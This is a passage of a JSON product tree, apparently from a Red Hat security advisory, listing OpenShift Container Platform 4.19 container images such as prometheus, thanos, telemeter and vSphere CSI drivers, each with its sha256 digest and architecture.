"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
